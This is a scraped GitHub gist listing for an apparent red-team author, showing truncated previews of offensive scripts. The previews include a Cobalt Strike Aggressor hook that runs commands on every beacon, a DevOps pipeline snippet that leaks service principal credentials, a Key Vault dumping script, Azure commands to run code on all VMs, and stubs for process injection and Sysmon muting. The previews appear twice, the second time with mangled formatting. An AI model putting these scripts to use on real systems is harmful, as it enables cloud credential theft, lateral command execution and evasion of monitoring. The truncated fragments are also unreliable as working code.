Melvin L Flangvik

## gist:c31b26129743be699133dc9dab9c02c5

on heartbeat_15m {
	    foreach $beacon (beacons()) {
			println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
	        $id = $beacon['id'];
			bipconfig($id,{
				print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
                exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
            });
	    }

## gist:5fb58dffa373a50f4d560a14adaa415b
#!/usr/bin/env python
# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
import argparse
from datetime import datetime
from base64 import b64encode,b64decode
from pushover import init, Client
from os import path

parser = argparse.ArgumentParser(description='beacon info')

## PKI_Abuse_cheatsheet.md

      
              1 file
            
          
              10 forks
            
          
              0 comments
            
          
              30 stars
            
          
                Flangvik
                / PKI_Abuse_cheatsheet.md
            
            
              Last active
              August 26, 2023 13:22
            
              
                PKI Abuse CheatSheet
              
          
    PKI Abuse

Some golden links when you are having issues:
https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Enumerating ADCS On Linux

Download and install Certi


## AzureCLICheatSheet.ps1
#List all resources
az resource list | convertfrom-json | foreach-object { $_ | Select-Object type, name, resourceGroup, id}

#List details for all VM's
az vm lis

#Run PowerShell command on a VM
az vm run-command invoke --command-id RunPowerShellScript --name MyVm --resource-group MyResourceGroup --scripts 'whoami'

#Run PowerShell command on ALL VM's

## PipelinesAbuseHijackPart2.ps1
#Steal service principal creds from session
Write-Host "`$servicePrincipalId = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:servicePrincipalId)))"`"))"
Write-Host "`$servicePrincipalKey = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:servicePrincipalKey)))"`"))"
Write-Host "`$tenantId = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:tenantId)))"`"))"
Write-Host "az login --service-principal -u `$servicePrincipalId -p `$servicePrincipalKey --tenant `$tenantId"


## DumpKeyVaultDevOps.ps1
#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec!
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline

#Suppress warnings for clean output
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true"

#Get all Azure KeyVaults from currently selected/scoped subscription
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity
$vaults = Get-AzKeyVault

## powershell-web-server.ps1
# This is a super **SIMPLE** example of how to create a very basic powershell webserver
# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.

# Http Server
$http = [System.Net.HttpListener]::new()

# Hostname and port to listen on
$http.Prefixes.Add("http://localhost:8080/")

# Start the Http Server

## XORBruteForce.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;

namespace XORBruteForce
{
    class Program
    {

## CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;


namespace InjectionTest
{
    public class DELEGATES
    {

## MuteSysmon.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;

namespace MuteSysmon
{
    class Program

	on heartbeat_15m {
	foreach $beacon (beacons()) {
	println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
	$id = $beacon['id'];
	bipconfig($id,{
	print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
	exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
	});
	}
	#!/usr/bin/env python
	# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
	# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
	import argparse
	from datetime import datetime
	from base64 import b64encode,b64decode
	from pushover import init, Client
	from os import path

	parser = argparse.ArgumentParser(description='beacon info')
	#List all resources
	az resource list \| convertfrom-json \| foreach-object { $_ \| Select-Object type, name, resourceGroup, id}

	#List details for all VM's
	az vm lis

	#Run PowerShell command on a VM
	az vm run-command invoke --command-id RunPowerShellScript --name MyVm --resource-group MyResourceGroup --scripts 'whoami'

	#Run PowerShell command on ALL VM's
	#Steal service principal creds from session
	Write-Host "`$servicePrincipalId = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:servicePrincipalId)))"`"))"
	Write-Host "`$servicePrincipalKey = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:servicePrincipalKey)))"`"))"
	Write-Host "`$tenantId = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`""$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:tenantId)))"`"))"
	Write-Host "az login --service-principal -u `$servicePrincipalId -p `$servicePrincipalKey --tenant `$tenantId"
	#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec!
	#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline

	#Suppress warnings for clean output
	Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true"

	#Get all Azure KeyVaults from currently selected/scoped subscription
	#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity
	$vaults = Get-AzKeyVault
	# This is a super SIMPLE example of how to create a very basic powershell webserver
	# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.

	# Http Server
	$http = [System.Net.HttpListener]::new()

	# Hostname and port to listen on
	$http.Prefixes.Add("http://localhost:8080/")

	# Start the Http Server
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.Linq;
	using System.Text;

	namespace XORBruteForce
	{
	class Program
	{
	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;


	namespace InjectionTest
	{
	public class DELEGATES
	{